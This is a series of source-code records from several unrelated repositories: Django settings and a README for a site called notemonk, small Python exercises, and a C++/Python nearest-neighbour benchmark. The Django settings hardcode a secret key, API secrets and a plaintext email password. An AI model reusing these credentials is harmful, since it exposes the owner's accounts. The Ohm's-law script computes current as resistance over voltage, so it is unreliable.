sqlite3.\r\n\r\nDATABASE_ENGINE = 'mysql' # or 'oracle', 'postgresql_psycopg2', 'postgresql', 'mysql',\r\nDATABASE_NAME = 'notemonk_db' # Or path to database file if using sqlite3.\r\nDATABASE_USER = 'root' # Not used with sqlite3.\r\nDATABASE_PASSWORD = '' # Not used with sqlite3.\r\nDATABASE_HOST = 'localhost' # Set to empty string for localhost. Not used with sqlite3.\r\nDATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.\r\n\r\n# Local time zone for this installation. Choices can be found here:\r\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\r\n# although not all choices may be available on all operating systems.\r\n# If running in a Windows environment this must be set to the same as your\r\n# system time zone.\r\nTIME_ZONE = 'America/Chicago'\r\n\r\n# Language code for this installation. All choices can be found here:\r\n# http://www.i18nguy.com/unicode/language-identifiers.html\r\nLANGUAGE_CODE = 'en-us'\r\nSITE_ID = 1\r\n\r\n# If you set this to False, Django will make some optimizations so as not\r\n# to load the internationalization machinery.\r\nUSE_I18N = True\r\n\r\n# Absolute path to the directory that holds media.\r\n# Example: \"/home/media/media.lawrence.com/\"\r\nMEDIA_ROOT = os.path.join(os.path.dirname(__file__), 'static')\r\n\r\nSTATICFILES_DIRS = [MEDIA_ROOT]\r\nSTATIC_URL = '/static/'\r\n\r\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\r\n# trailing slash if there is a path component (optional in other cases).\r\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\r\nMEDIA_URL = 'http://static.notemonk.com/'\r\n\r\n# URL prefix for admin media -- CSS, JavaScript and images. 
Make sure to use a\r\n# trailing slash.\r\n# Examples: \"http://foo.com/media/\", \"/media/\".\r\nADMIN_MEDIA_PREFIX = '/static/admin/'\r\nADMIN_MEDIA_ROOT = os.path.join(os.path.dirname(__file__), 'media')\r\n\r\n# Make this unique, and don't share it with anybody.\r\nSECRET_KEY = 'ny2a@_*z4^9nw93nd96hdte*e#&x!**rskn(*k0h99y+u^-y3g'\r\n\r\n# List of callables that know how to import templates from various sources.\r\nTEMPLATE_LOADERS = (\r\n 'django.template.loaders.filesystem.load_template_source',\r\n 'django.template.loaders.app_directories.load_template_source',\r\n# 'django.template.loaders.eggs.load_template_source',\r\n)\r\n\r\nMIDDLEWARE_CLASSES = (\r\n 'johnny.middleware.LocalStoreClearMiddleware',\r\n 'johnny.middleware.QueryCacheMiddleware',\r\n 'django.middleware.cache.UpdateCacheMiddleware',\r\n 'core.utils.StripCookieMiddleware',\r\n 'django.middleware.common.CommonMiddleware',\r\n 'django.contrib.sessions.middleware.SessionMiddleware',\r\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\r\n 'django.middleware.gzip.GZipMiddleware',\r\n 'django.middleware.http.ConditionalGetMiddleware',\r\n 'debug_toolbar.middleware.DebugToolbarMiddleware',\r\n# 'facebook.djangofb.FacebookMiddleware',\r\n 'core.recaptcha_form.RecaptchaMiddleware',\r\n 'django.middleware.cache.FetchFromCacheMiddleware',\r\n)\r\n\r\nAUTHENTICATION_BACKENDS = (\r\n 'django.contrib.auth.backends.ModelBackend',\r\n #'core.auth_backends.FacebookBackend',\r\n 'social_auth.backends.facebook.FacebookBackend',\r\n )\r\n\r\n# Context Processors\r\nTEMPLATE_CONTEXT_PROCESSORS = [\r\n 'django.core.context_processors.auth',\r\n 'django.core.context_processors.media',\r\n 'django.core.context_processors.request',\r\n]\r\n\r\nif DEBUG:\r\n TEMPLATE_CONTEXT_PROCESSORS.append(\r\n 'django.core.context_processors.debug')\r\n\r\nROOT_URLCONF = '%s.urls' % PROJNAME\r\n\r\nTEMPLATE_DIRS = (\r\n os.path.join(os.path.dirname(__file__), 'templates').replace('\\\\', '/'),\r\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\r\n # Always use forward slashes, even on Windows.\r\n # Don't forget to use absolute paths, not relative paths.\r\n)\r\n\r\nAPPEND_SLASH = True\r\n\r\nINTERNAL_IPS = ('127.0.0.1')\r\n#INTERNAL_IPS = ('127.0.0.1', '115.252.180.228')\r\n\r\ndef custom_show_toolbar(request):\r\n remote_ip = request.META.get('REMOTE_ADDR', None)\r\n return remote_ip in INTERNAL_IPS\r\n\r\nDEBUG_TOOLBAR_CONFIG = {\r\n 'SHOW_TOOLBAR_CALLBACK': custom_show_toolbar,\r\n 'INTERCEPT_REDIRECTS': False,\r\n}\r\n\r\nCACHE_BACKEND = 'memcached://127.0.0.1:11211/'\r\nJOHNNY_CACHE_BACKEND = CACHE_BACKEND\r\nJOHNNY_MIDDLEWARE_KEY_PREFIX='jc_myproj'\r\n\r\nINSTALLED_APPS = (\r\n 'django.contrib.admin',\r\n 'django.contrib.admindocs',\r\n 'django.contrib.auth',\r\n 'django.contrib.contenttypes',\r\n 'django.contrib.sessions',\r\n 'django.contrib.sites',\r\n 'django.contrib.comments',\r\n 'django.contrib.staticfiles',\r\n 'reversion',\r\n 'registration',\r\n 'markitup',\r\n 'mailer',\r\n 'notification',\r\n 'south',\r\n 'chronograph',\r\n 'debug_toolbar',\r\n '%s.core' % PROJNAME,\r\n 'social_auth'\r\n)\r\n\r\n#LOGIN_URL = '/login/'\r\n#LOGIN_REDIRECT_URL = '/login/done/'\r\n\r\nAUTH_PROFILE_MODULE = 'core.UserProfile'\r\n\r\nFACEBOOK_APP_ID = '7703fdc51bb3335309922341cdb1ec0f' #'215908598562308' \r\nFACEBOOK_API_SECRET = 'de54204098ee835ead92494d532c8454' #'15e2ef23646b90f7ea0b8a1a34877c5c'\r\n\r\n\r\nLOGIN_URL = '/login-form/'\r\nLOGIN_REDIRECT_URL = '/' \r\nLOGIN_ERROR_URL = 
'/login-error/'\r\nSOCIAL_AUTH_COMPLETE_URL_NAME = 'socialauth_complete'\r\nSOCIAL_AUTH_ASSOCIATE_URL_NAME = 'socialauth_associate_complete'\r\nSOCIAL_AUTH_INACTIVE_USER_URL = '/' \r\nSOCIAL_AUTH_MODELS = 'social_auth.db.django_models'\r\n\r\nGOOGLE_API_KEY = 'ABQIAAAABXgfV0AIiD-Sh91u8PWF1hTcWMrQi-gXWhUrBy2z8tO26jF3ChS6N36bzQ7AzAxGftdDJ-XQZDQBtg'\r\n#MARKITUP_FILTER = ('markdown.markdown', {'safe_mode': True, 'extensions':['urlize', 'safeimage']})\r\nMARKITUP_FILTER = ('markdown.markdown', {'safe_mode': True, 'extensions':['urlize']})\r\nMARKITUP_SET = 'markitup/sets/markdown'\r\nMARKITUP_SKIN = 'markitup/skins/simple'\r\n\r\nACCOUNT_ACTIVATION_DAYS = 7\r\n\r\nDEFAULT_FROM_EMAIL = '[email protected]'\r\n\r\nRECAPTCHA_PRIVATE_KEY = '6LdvuQsAAAAAAMZEvIaakrNRtEkhfNzHOq7VvPf2'\r\nRECAPTCHA_PUBLIC_KEY = '6LdvuQsAAAAAAChoAZ98QOiJGOLUrvKsJ9JNU8Kr'\r\n\r\nCACHE_DIR = '/var/www/notemonk.com/www/cache/'\r\nOPENID_SREG = {\"requred\": \"nickname, email\", \"optional\":\"postcode, country\", \"policy_url\": \"\"}\r\nOPENID_AX = [{\"type_uri\": \"email\",\r\n \"count\": 1,\r\n \"required\": True,\r\n \"alias\": \"email\"},\r\n {\"type_uri\": \"fullname\",\r\n \"count\":1 ,\r\n \"required\": False,\r\n \"alias\": \"fullname\"}]\r\n\r\nOPENID_REDIRECT_NEXT = '/accounts/openid/done/'\r\n\r\nNOTIFICATION_QUEUE_ALL = False\r\nSUPERUSERS_NOTIFY = True\r\n\r\nSEND_BROKEN_LINK_EMAILS = True\r\nSERVER_EMAIL = '[email protected]'\r\n\r\nEMAIL_BACKEND = 'core.utils.RoundRobinEmailBackend'\r\nRR_EMAIL_USERS = [x + '@notemonk.com' for x in ('monk', 'admin', 'mailer1', 'mailer2', 'mailer3', 'mailer4', 'mailer5')]\r\n\r\nEMAIL_USE_TLS = True\r\nEMAIL_HOST = 'smtp.gmail.com'\r\nEMAIL_HOST_USER = '[email protected]'\r\nEMAIL_HOST_PASSWORD = 'Willy45Nilly!'\r\nEMAIL_PORT = 587\r\n\r\nFILE_UPLOAD_PERMISSIONS = 0644\r\n\r\n#if DEBUG:\r\n# EMAIL_HOST = '127.0.0.1'\r\n# EMAIL_PORT = 1025\r\n\r\nCACHE_MIDDLEWARE_ANONYMOUS_ONLY = True\r\n#CACHE_MIDDLEWARE_ALIAS = 'default'\r\n#CACHE_MIDDLEWARE_SECONDS = 600\r\n#CACHE_MIDDLEWARE_KEY_PREFIX = ''\r\n"
},
{
"alpha_fraction": 0.7551724314689636,
"alphanum_fraction": 0.7689655423164368,
"avg_line_length": 33.117645263671875,
"blob_id": "7d99f51348cc1ec0beb97ca850f7fcc78434582a",
"content_id": "5af04f065e49f00cdae69ae186b846d9d57b6e09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 17,
"path": "/README.md",
"repo_name": "headrun/notemonk",
"src_encoding": "UTF-8",
"text": "# notemonk\n\n1) Create a virtual env using `virtualenv Notemonk`\n\n2) Activate venv enivironment by `cd Notemonk; source bin/activate;`\n\n3) Clone your project from git with `git clone https://github.com/headrun/notemonk.git`\n\n4) copy the requirements to current dir with `cp notemonk/requirements.pip .`\n\n5) Install the requirement with `pip install -r requirements.pip`\n\n6) You need to copy static images from prod setup or create softlink if prod setup is in same machine.\n\n7) Take a db backup from prod setup or backup location.\n\n8) Once it is configured check in django server.\n"
}
] | 38 |
otter-leo/lei-de-ohm | https://github.com/otter-leo/lei-de-ohm | c3d7f8abf81703428f2d822c90cf3a9ee17bd352 | b6337cd7e57443b62aac2b2cfa7c847ff43e4f9a | 43b71fa2e3763c56c50eb59d5317554d861b09b1 | refs/heads/master | 2020-04-03T18:14:39.352832 | 2018-10-31T00:44:48 | 2018-10-31T00:44:48 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6065318584442139,
"alphanum_fraction": 0.6088647246360779,
"avg_line_length": 41.83333206176758,
"blob_id": "ed9d629231bb13296e68156a1f6e66680da3a1a6",
"content_id": "e6ef471719b73adcccbea2c0d25633fe87818b83",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1294,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 30,
"path": "/lei-de-ohm.py",
"repo_name": "otter-leo/lei-de-ohm",
"src_encoding": "UTF-8",
"text": "\nimport math\nvalid = False\n\n\nwhile valid == False:\n calc = input('O que você deseja calcular? Para resistência use \"R\", para votagem use \"V\" e para corrente use \"A\":').lower()\n if calc =='a' or calc == 'v' or calc == 'r':\n valid = True\n else:\n print('Digite apenas as letras \"V\", \"R\" e \"A\" para calculcar a Voltagem, Resistencia e Corrente, respectivamente.')\n\n\nif calc =='a' or calc == 'v' or calc == 'r':\n if calc == 'a':\n r= float(input('Insira o valor da resistência. Use apenas valores separados por ponto:'))\n v= float(input('Insira o valor da voltagem. Use apenas valores separados por ponto:'))\n valor = round(r/v,3)\n print ('O valor da corrente é:', valor ,'A')\n\n elif calc == 'v':\n r= float(input('Insira o valor da resistência. Use apenas valores separados por ponto:'))\n i= float(input('Insira o valor da corrente:'))\n valor = round(i * r, 3)\n print ('O valor da voltagem é:', valor ,'V')\n\n elif calc == 'r':\n v= float(input('Insira o valor da voltagem. Use apenas valores separados por ponto:'))\n i= float(input('Insira o valor da corrente. Use apenas valores separados por ponto:'))\n valor = round(v / i,3)\n print ('O valor da resistencia é:', valor ,'Ω')\n"
}
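> For reference, the three branches above are all rearrangements of Ohm's law, V = I * R (which is also why the current branch had to be v / r rather than the original r / v). A compact self-checking restatement; the function name is ours, not the repo's:

```python
def ohm(v=None, i=None, r=None):
    """Given any two of voltage (V), current (A), resistance (ohm), return the third."""
    if v is None:
        return i * r      # V = I * R
    if i is None:
        return v / r      # I = V / R
    return v / i          # R = V / I

assert ohm(i=2.0, r=5.0) == 10.0   # 2 A through 5 ohm drops 10 V
assert ohm(v=10.0, r=5.0) == 2.0   # 10 V across 5 ohm drives 2 A
assert ohm(v=10.0, i=2.0) == 5.0   # 10 V at 2 A implies 5 ohm
```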
] | 1 |
sarureddi/localarray | https://github.com/sarureddi/localarray | 1440830d8aae7ea984cd56bd80908c668c89d5bf | 1e20da1a94ef027025188a684b82b98ec4d63440 | e9b9e27c1cf30c6c6bb5383a8abaa6ff4b6ee2d5 | refs/heads/master | 2020-06-01T09:05:46.148191 | 2019-06-07T10:25:08 | 2019-06-07T10:25:08 | 190725526 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.42934781312942505,
"alphanum_fraction": 0.5597826242446899,
"avg_line_length": 19.44444465637207,
"blob_id": "e4c6d11d6978334d790ef2a27f0d8f48cf8ef2d3",
"content_id": "f9c596bdf826882e3ea186957deb5d37fcf2205b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 38,
"num_lines": 9,
"path": "/array.py",
"repo_name": "sarureddi/localarray",
"src_encoding": "UTF-8",
"text": "n1=int(input())\nl1=[int(i) for i in input().split()]\nc1=0\nfor i in range(1,n1-1):\n\tif l1[i]<l1[i-1] and l1[i]<l1[i+1]:\n\t\tc1+=1\n\telif l1[i]>l1[i-1] and l1[i]>l1[i+1]:\n\t\tc1+=1\nprint(c1)\n"
}
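> The script reads `n` and then `n` space-separated integers, and counts the interior entries that are strictly smaller or strictly larger than both neighbors. A quick self-check of that logic as a function; the refactoring is ours, the algorithm is the one above:

```python
def count_local_extrema(values):
    # An interior element counts if it is a strict valley or a strict peak.
    count = 0
    for i in range(1, len(values) - 1):
        if values[i] < values[i-1] and values[i] < values[i+1]:
            count += 1
        elif values[i] > values[i-1] and values[i] > values[i+1]:
            count += 1
    return count

# 3 and 4 are peaks, 2 is a valley: 3 extrema in total.
assert count_local_extrema([1, 3, 2, 4, 1]) == 3
```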
] | 1 |
hiyyg/OpenFLANN | https://github.com/hiyyg/OpenFLANN | e2c454b8f9d58460cb617cd41020645be015cb3e | a1815ecdbd4d064f016ad2a8999004a4b7bdf728 | 2095103bb8f313555694f043fedec9a29210308e | refs/heads/main | 2023-04-18T06:52:17.844161 | 2021-04-30T06:44:09 | 2021-04-30T06:44:09 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7335788607597351,
"alphanum_fraction": 0.7470840811729431,
"avg_line_length": 35.977272033691406,
"blob_id": "9c4bba6c2e49ec001af82856001d83cf4aa1a972",
"content_id": "c74308da14f649dcd1aab6470896bda83f10b36a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1629,
"license_type": "no_license",
"max_line_length": 301,
"num_lines": 44,
"path": "/README.md",
"repo_name": "hiyyg/OpenFLANN",
"src_encoding": "UTF-8",
"text": "# OpenFLANN\n\nI found PicoFLANN and compare the speed of alorithms, namely *PCL FLANN*, *NanoFLANN*, and *PicoFLANN*.\n\n## Characteristics\n\n* Set NanoFLANN and PicoFLANN to be avaiable on Point Cloud Libarary (PCL).\n* It's simple to use them! Just git pull this repository, then copy & paste the header files in `include` folder.\n* Usage is totally same with Point Cloud Library, i.e., `setInputCloud`, `nearestSearch`, or `radiusSearch`. \n* Many robotics guys refer to [NanoFLANN in LOAM](https://github.com/laboshinl/loam_velodyne/blob/master/include/loam_velodyne/nanoflann_pcl.h); however, the function `radiusSearch` in LOAM is actually not in use so the function does not work properly. So, I debugged it and revise the `radiusSearch`.\n## Reference \n* [PCL FLANN](https://pointclouds.org/documentation/tutorials/kdtree_search.html)\n* [NanoFLANN](https://github.com/jlblancoc/nanoflann)\n* [PicoFLANN](https://github.com/rmsalinas/picoflann) (The original developer says it is faster than NanoFLANN, and it actually is when the scale of points becomes larger)\n\n\n## Simulation results\n\nExperiments: Please refer to `src/main.cpp`. I reran the experiment 1,000 times to measure mean speed of each case.\n\nOne-line summary: For robotics application, NanoFLANN is better than other FLANN implementations.\n\nYou can show the results via python code (tabulate is necessary)\n```\ncd outputs\npython viz_output.py\n```\n\n### K-Nearest Neighbor\n\n\n\n\n\n\n\n\n### Radius Search\n\n\n\n\n\n\n\n\n"
},
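> The README's "viz" step depends on the `tabulate` package (used by `outputs/viz_output.py`, shown in full later in this record). As a minimal sketch of the kind of table that step prints (the numbers below are placeholders, not measurements):

```python
from tabulate import tabulate

# Placeholder rows only: real values come from the benchmark output files.
rows = [["PCL",  0.012, 0.80],
        ["Nano", 0.009, 0.50],
        ["Pico", 0.008, 0.40]]
print(tabulate(rows,
               headers=["Alg.", "Init. [s]", "Search [ms]"],
               tablefmt="fancy_grid"))
```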
{
"alpha_fraction": 0.48324888944625854,
"alphanum_fraction": 0.5053113102912903,
"avg_line_length": 38.7337646484375,
"blob_id": "addc7074cbe1d82dbba9a2ee99a720eda6b0261e",
"content_id": "2cda9c55f7fcf15bac939baa091cc65d91e381e3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 6119,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 154,
"path": "/src/main.cpp",
"repo_name": "hiyyg/OpenFLANN",
"src_encoding": "UTF-8",
"text": "#include <pcl/point_cloud.h>\n#include <pcl/kdtree/kdtree_flann.h>\n#include <fstream>\n#include <iostream>\n#include <vector>\n#include <ctime>\n#include \"nanoflann_pcl.h\"\n#include \"picoflann_pcl.h\"\n\n#define RANDOM_SCALE 100.0\n\nusing namespace std;\n\nstruct TimeSet{\n float _t_pcl;\n float _t_nano;\n float _t_pico;\n TimeSet(float t_pcl, float t_nano, float t_pico): _t_pcl(t_pcl), _t_nano(t_nano), _t_pico(t_pico){}\n};\nTimeSet print_time(const clock_t& c0, const clock_t& c1, const clock_t& c2, const clock_t& c3){\n float t_pcl = float(c1 - c0) / CLOCKS_PER_SEC;\n float t_nano = float(c2 - c1) / CLOCKS_PER_SEC;\n float t_pico = float(c3 - c2) / CLOCKS_PER_SEC;\n\n// cout<<t_pcl<<\" | \"<<t_nano<<\" | \"<<t_pico<<endl;\n return TimeSet(t_pcl, t_nano, t_pico);\n}\ntemplate <typename T>\nvoid print_vectors(vector<T>& v0, vector<T>& v1, vector<T>& v2){\n assert(v0.size() == v1.size());\n assert(v1.size() == v2.size());\n assert(v2.size() == v0.size());\n for (int i=0; i< v0.size(); ++i){\n cout<<v0[i]<<\" | \"<<v1[i]<< \" | \"<<v2[i]<<endl;\n }\n}\n\nint main (int argc, char** argv)\n{\n srand (time (NULL));\n pcl::KdTreeFLANN<pcl::PointXYZ> PCLFLANN_kdtree;\n nanoflann::KdTreeFLANN<pcl::PointXYZ> NanoFLANN_kdtree;\n picoflann_pcl::KdTreeFLANN<pcl::PointXYZ> PicoFLANN_kdtree;\n\n vector<int> num_random_pts = {10000, 30000, 60000, 100000, 200000};\n vector<int> K_pts = {1, 10, 100, 500, 1000, 5000};\n vector<double> radiuses = {5.0, 10.0, 20.0, 40.0, 80.0};\n\n // --------- Set target param -----------\n string target = \"knn\"; // radius or knn\n // --------------------------------------\n int num_params;\n if (target == \"radius\"){\n num_params = radiuses.size();\n }\n else if (target == \"knn\"){\n num_params = K_pts.size();\n }\n\n string absDir = \"/home/shapelim/CLionProjects/OpenFLANN/outputs\";\n double searchRadius; // for radiusSearch\n int K; // for KNN\n for (const int& NUM_RANDOM_SAMPLE_POINTS: num_random_pts) {\n for (int ii = 0; ii < num_params; ++ii) {\n string targetName;\n if (target == \"radius\"){\n searchRadius = radiuses[ii];\n targetName = to_string(int(round(searchRadius * 10) / 10));\n }\n else if (target == \"knn\"){\n K = K_pts[ii];\n targetName = to_string(K);\n }\n\n string txtname = targetName + \"_\" + to_string(NUM_RANDOM_SAMPLE_POINTS) + \".txt\";\n string pclFilename = absDir + \"/pcl_\" + txtname;\n string nanoFilename = absDir + \"/nano_\" + txtname;\n string picoFilename = absDir + \"/pico_\" + txtname;\n std::ofstream pclO(pclFilename, ios::app);\n std::ofstream nanoO(nanoFilename, ios::app);\n std::ofstream picoO(picoFilename, ios::app);\n\n for (int dummyIdx = 0; dummyIdx < 1000; ++dummyIdx) {\n\n pcl::PointCloud<pcl::PointXYZ>::Ptr cloud(new pcl::PointCloud<pcl::PointXYZ>);\n\n // Generate pointcloud data\n cloud->width = NUM_RANDOM_SAMPLE_POINTS;\n cloud->height = 1;\n cloud->points.resize(cloud->width * cloud->height);\n\n for (std::size_t i = 0; i < cloud->size(); ++i) {\n (*cloud)[i].x = RANDOM_SCALE * rand() / (RAND_MAX + 1.0f);\n (*cloud)[i].y = RANDOM_SCALE * rand() / (RAND_MAX + 1.0f);\n (*cloud)[i].z = RANDOM_SCALE * rand() / (RAND_MAX + 1.0f);\n }\n\n // check time\n clock_t c_i0 = clock();\n PCLFLANN_kdtree.setInputCloud(cloud);\n clock_t c_i1 = clock();\n NanoFLANN_kdtree.setInputCloud(cloud);\n clock_t c_i2 = clock();\n PicoFLANN_kdtree.setInputCloud(cloud);\n clock_t c_i3 = clock();\n\n TimeSet init_ts = print_time(c_i0, c_i1, c_i2, c_i3);\n\n pcl::PointXYZ searchPoint;\n\n searchPoint.x = RANDOM_SCALE * rand() / 
(RAND_MAX + 1.0f);\n searchPoint.y = RANDOM_SCALE * rand() / (RAND_MAX + 1.0f);\n searchPoint.z = RANDOM_SCALE * rand() / (RAND_MAX + 1.0f);\n\n // K nearest neighbor search or Radius\n\n std::vector<int> idxPcl(K), idxNano(K), idxPico(K);\n std::vector<float> distPcl(K), distNano(K), distPico(K);\n clock_t c_k0, c_k1, c_k2, c_k3;\n if (target == \"knn\"){\n c_k0 = clock();\n PCLFLANN_kdtree.nearestKSearch(searchPoint, K, idxPcl, distPcl);\n c_k1 = clock();\n NanoFLANN_kdtree.nearestKSearch(searchPoint, K, idxNano, distNano);\n c_k2 = clock();\n PicoFLANN_kdtree.nearestKSearch(searchPoint, K, idxPico, distPico);\n c_k3 = clock();\n }else if (target == \"radius\"){\n std::cout<<\"Searching radius...\"<<std::endl;\n c_k0 = clock();\n PCLFLANN_kdtree.radiusSearch(searchPoint, searchRadius, idxPcl, distPcl);\n c_k1 = clock();\n NanoFLANN_kdtree.radiusSearch(searchPoint, searchRadius, idxNano, distNano);\n c_k2 = clock();\n PicoFLANN_kdtree.radiusSearch(searchPoint, searchRadius, idxPico, distPico);\n c_k3 = clock();\n// To check the size!\n// cout<<idxPcl.size()<<\" , \"<<idxNano.size()<< \" , \"<<idxPico.size()<<endl;\n// cout<<distPcl.size()<<\" , \"<<distNano.size()<< \" , \"<<distPico.size()<<endl;\n }\n\n TimeSet K_ts = print_time(c_k0, c_k1, c_k2, c_k3);\n\n pclO << init_ts._t_pcl << \" \" << K_ts._t_pcl<< endl;\n nanoO << init_ts._t_nano << \" \" << K_ts._t_nano<< endl;\n picoO << init_ts._t_pico << \" \" << K_ts._t_pico<< endl;\n }\n pclO.close();\n nanoO.close();\n picoO.close();\n }\n }\n return 0;\n}\n"
},
{
"alpha_fraction": 0.46659305691719055,
"alphanum_fraction": 0.5063501000404358,
"avg_line_length": 38.369564056396484,
"blob_id": "cae8b1be8d93540bd1541245c8181a54cf2c1e8a",
"content_id": "84abe83c33d3b9c8ec36ab08ba4a664b69de2e73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1811,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 46,
"path": "/outputs/viz_output.py",
"repo_name": "hiyyg/OpenFLANN",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom tabulate import tabulate\nnum_pts = 10000\n\ndef parse_data(alg_name, target_np):\n means = np.mean(target_np, axis=0)\n time_set = round(means[0], 5)\n time_iter = round(means[1] * 1000, 5)\n time_total = round(np.mean(np.sum(target_np, axis=1)), 5)\n\n return [alg_name, time_set, time_iter, time_total]\n\nif __name__ == \"__main__\":\n TARGET = \"knn\" #\"knn\" or radius\n k_pts = [1, 10, 100, 500, 1000, 5000]\n radiuses = [5, 10, 20, 40, 80]\n if TARGET == \"knn\":\n target_param = k_pts\n table_header = [\"K points\", \"Alg.\", \"Init. [s]\", \"Search [ms]\", \"Total [s]\"]\n elif TARGET == \"radius\":\n target_param = radiuses\n table_header = [\"radius [m]\", \"Alg.\", \"Init. [s]\", \"Search [ms]\", \"Total [s]\"]\n for num_pts in [10000, 30000, 60000, 100000, 200000]:\n print(\"Num. points: \" + str(num_pts))\n table_line = []\n for i in target_param:\n pcl = np.loadtxt(TARGET + \"/pcl_\" + str(i) + \"_\" + str(num_pts)+\".txt\", delimiter=\" \")\n nano = np.loadtxt(TARGET + \"/nano_\" + str(i) + \"_\" + str(num_pts)+\".txt\", delimiter=\" \")\n pico = np.loadtxt(TARGET + \"/pico_\" + str(i) + \"_\" + str(num_pts)+\".txt\", delimiter=\" \")\n table_viz = []\n table_viz.append(parse_data(\"PCL\", pcl))\n table_viz.append(parse_data(\"Nano\", nano))\n table_viz.append(parse_data(\"Pico\", pico))\n per_line = [i]\n for j in range(4):\n cell = \"\"\n for k in range(3):\n cell += str(table_viz[k][j])\n if k != 2:\n cell += \"\\n\"\n\n per_line.append(cell)\n\n table_line.append(per_line)\n\n print(tabulate(table_line, headers=table_header, tablefmt=\"fancy_grid\"))\n"
},
{
"alpha_fraction": 0.5836057662963867,
"alphanum_fraction": 0.5875759124755859,
"avg_line_length": 36.23478317260742,
"blob_id": "1da6eb0914677c0c894c7c82c9442fef60d2670d",
"content_id": "4d8fcb1fb5a64527681560ff2f9682e2f560bd30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4282,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 115,
"path": "/include/picoflann_pcl.h",
"repo_name": "hiyyg/OpenFLANN",
"src_encoding": "UTF-8",
"text": "//\n// Created by Hyungtae Lim on 21. 4. 14..\n//\n\n#ifndef KDTREE_FLANN_PICOFLANN_PCL_H\n#define KDTREE_FLANN_PICOFLANN_PCL_H\n\n#include \"picoflann.h\"\n\nnamespace picoflann_pcl\n{\n\n// Adapter class to give to nanoflann the same \"look and fell\" of pcl::KdTreeFLANN.\n// limited to squared distance between 3D points\n template <typename PointT>\n class KdTreeFLANN\n {\n public:\n\n typedef boost::shared_ptr<KdTreeFLANN<PointT> > Ptr;\n typedef boost::shared_ptr<const KdTreeFLANN<PointT> > ConstPtr;\n\n typedef typename pcl::PointCloud<PointT> PointCloud;\n typedef typename pcl::PointCloud<PointT>::Ptr PointCloudPtr;\n typedef typename pcl::PointCloud<PointT>::ConstPtr PointCloudConstPtr;\n\n typedef boost::shared_ptr<std::vector<int> > IndicesPtr;\n typedef boost::shared_ptr<const std::vector<int> > IndicesConstPtr;\n\n KdTreeFLANN();\n\n\n inline Ptr makeShared () { return Ptr (new KdTreeFLANN<PointT> (*this)); }\n\n void setInputCloud(KdTreeFLANN::PointCloudPtr cloud);\n\n int nearestKSearch (const PointT& point, int k, std::vector<int> &k_indices,\n std::vector<float> &k_sqr_distances);\n\n int radiusSearch (const PointT &point, double radius, std::vector<int> &k_indices,\n std::vector<float> &k_sqr_distances) const;\n\n private:\n struct Point_Adaptor{\n inline float operator( )(const PointT &elem, int dim)const{\n if (dim ==0) return elem.x;\n else if (dim == 1) return elem.y;\n else if (dim == 2) return elem.z;\n else throw std::invalid_argument(\"Invalid dimension is coming\");\n }\n };\n\n struct PointCloud_Container{\n size_t _size;\n PointCloudPtr _array;\n PointCloud_Container(){}\n PointCloud_Container(PointCloudPtr& array, size_t Size) {\n _array = array;\n _size = Size;\n }\n inline size_t size()const{return _size;}\n inline const PointT &at(int idx)const{ return _array->points[idx];}\n };\n PointCloud_Container _container;\n picoflann::KdTreeIndex<3, Point_Adaptor> _kdtree; // 3 indicates the dimension: x, y, z\n };\n\n//---------- Definitions ---------------------\n template<typename PointT> inline\n KdTreeFLANN<PointT>::KdTreeFLANN(){}\n\n template<typename PointT> inline\n void KdTreeFLANN<PointT>::setInputCloud(KdTreeFLANN::PointCloudPtr cloud)\n {\n size_t num_pts = cloud->points.size();\n _kdtree.build(KdTreeFLANN::PointCloud_Container(cloud, num_pts));\n _container = KdTreeFLANN::PointCloud_Container(cloud, num_pts);\n }\n\n template<typename PointT> inline\n int KdTreeFLANN<PointT>::nearestKSearch(const PointT& point, int num_closest,\n std::vector<int> &k_indices,\n std::vector<float> &k_sqr_distances)\n {\n std::vector<std::pair<uint32_t,double> > resultSet = _kdtree.searchKnn(_container, point, num_closest);\n const size_t nFound = resultSet.size();\n // Set results in PCL format\n k_indices.resize(nFound);\n k_sqr_distances.resize(nFound);\n for(int i=0; i<nFound; i++ ){\n k_indices[i] = static_cast<int>(resultSet[i].first);\n k_sqr_distances[i] = static_cast<float>(resultSet[i].second);\n }\n return nFound;\n }\n\n template<typename PointT> inline\n int KdTreeFLANN<PointT>::radiusSearch(const PointT &point, double radius,\n std::vector<int> &k_indices,\n std::vector<float> &k_sqr_distances) const\n {\n std::vector<std::pair<uint32_t, double> > resultSet = _kdtree.radiusSearch(_container, point, radius);\n const size_t nFound = resultSet.size();\n\n k_indices.resize(nFound);\n k_sqr_distances.resize(nFound);\n for(int i=0; i<nFound; i++ ){\n k_indices[i] = static_cast<int>(resultSet[i].first);\n k_sqr_distances[i] = 
static_cast<float>(resultSet[i].second);\n }\n return nFound;\n }\n}\n\n#endif //KDTREE_FLANN_PICOFLANN_PCL_H\n"
},
{
"alpha_fraction": 0.772857129573822,
"alphanum_fraction": 0.7828571200370789,
"avg_line_length": 25.923076629638672,
"blob_id": "583d0771f41198c63b5efbe4886fc47ef2003728",
"content_id": "b95614f5465990d9e3271e7b39433d6a8a8006fb",
"detected_licenses": [],
